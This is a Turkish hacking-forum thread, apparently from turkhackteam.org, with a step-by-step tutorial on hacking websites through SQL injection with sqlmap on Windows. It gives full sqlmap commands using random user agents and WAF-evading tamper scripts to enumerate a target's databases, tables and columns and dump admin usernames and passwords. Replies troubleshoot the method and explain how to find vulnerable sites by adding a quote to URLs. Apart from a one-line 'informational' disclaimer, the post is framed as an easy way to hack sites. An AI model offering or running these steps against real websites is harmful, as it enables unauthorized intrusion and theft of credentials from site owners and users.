DM'den Ekran Görüntüsü Atabilir Misin Dostum? Daha Detaylı Görmek İstiyorum.
Tamam
DM'den Ekran Görüntüsü Atabilir Misin Dostum? Daha Detaylı Görmek İstiyorum.
Başaralı ellerine sağlıkDosyalar & Tool
+ Python 3.10.1 adlı setup ile Python kuruyoruz
+ sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz
+ sqlmap Klasörü İçindeki Dosyayı "sqlmap" Diye Değiştiriyoruz
Python İndirmek İçin Tıklayınız +++ SQLMAP İndirmek İçin Tıklayınız
sqlmap'ı CMD ile çalıştırma ;
Yukarıdakileri yaptıktan sonra Başlat'tan CMD konsolunu açalım ve konsol "C:" dizinine gelene kadar şu kodu yazalım ;
Kod:cd ../../
Konsol C:\ dizinine geldikten sonrada şu kodu yazalım ;
Kod:cd sqlmap
Database Çekimi ;
NOT: '403' Hatası Almamak İçin Verdiğim Parametreleri Kullanınız.
Kod:python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs
Veri Tabanı İsimleri Geldikten Sonra Şu Komutu Giriyoruz ; [information_schema Bizi İlgilendirmemektedir.]
Kod:python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME --Tables
Tablolar Geldikten Sonra İse Gireceğimiz Komut Bu ;
[Admin Ve Password Bilgilerinin Olduğu Tabloyu Tahmin Edebilirsiniz, Bulduk Varsayalım.]
Kod:python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLONAME --Columns
Kolonları Bulduktan Sonra Son Olarak Bu Komutu Giriyoruz ;
[Admin Ve Password Bilgilerini Çekeceğiz.]
Kod:python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLESNAME -C COLUMNNAME (örn: admin,pass) --dump
Beğenmeyi Unutmayın! İYİ FORUMLAR.
-Bilgilendirme Amaçlıdır-
ᴏʙᴛ ɪs ʜᴇʀʏᴇʀᴅᴇ
Elinize sağlık hocam
Başaralı ellerine sağlık
bende yine olmuyor :/sqlmap Dosyasını C:\ Dizinine Attınız Mı
Teşekkürler.
Ne Demek.
İsterseniz DM Gelin, Anlatayım.
Ellerinize ve emeklerinize sağlık.
elinize sağlık
Hata Değil, Şu Şekilde Çalıştırırsanız Olacaktır.Bana şu hatayı veriyor
![]()
python sqlmap.py hedefsite --dbs
Teşekkürler.elinize sağlık
çalıştırırsanız derken çalıştırdım zaten?Hata Değil, Çalıştırırsanız Olacaktır.
Teşekkürler.
Üstelik sql açığı olan URL ile yapmanız lazım örnek:Bana şu hatayı veriyor
![]()
Kod orada Dostumçalıştırırsanız derken çalıştırdım zaten?
Peki SQL açığı olup olmadığını nerden öğrenebilirim?
URL'nin SonunaPeki SQL açığı olup olmadığını nerden öğrenebilirim?
'
koyunca Syntax Hatası veriyorsa vardır, Dilerseniz şu konumu da okuyun. teşekkürlerURL'nin Sonuna'
koyunca Syntax Hatası veriyorsa vardır, Dilerseniz şu konumu da okuyun.
SQL Açığı İle Site Hacklemek [Windows] - Uygulamalı
Hepinize Merhaba Değerli THT Üyeleri; Forumda "Site Nasıl Hacklenir / Site Hackleme Yolları" Gibi Çok Fazla Konu Açılıyor, Ben De En Kolay Site Hackleme Yöntemini Sizlere Sunuyorum. Daha Önceden 'sqlmap' Aracından Bahsetmiş; Nasıl Kurulacağını, Nasıl Kullanılacağından vb. Anlatmıştım. Biz CMD...www.turkhackteam.org
Teşekkürler Dostum.Ellerine sağlık hocam. Yararlı çalışma.
Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.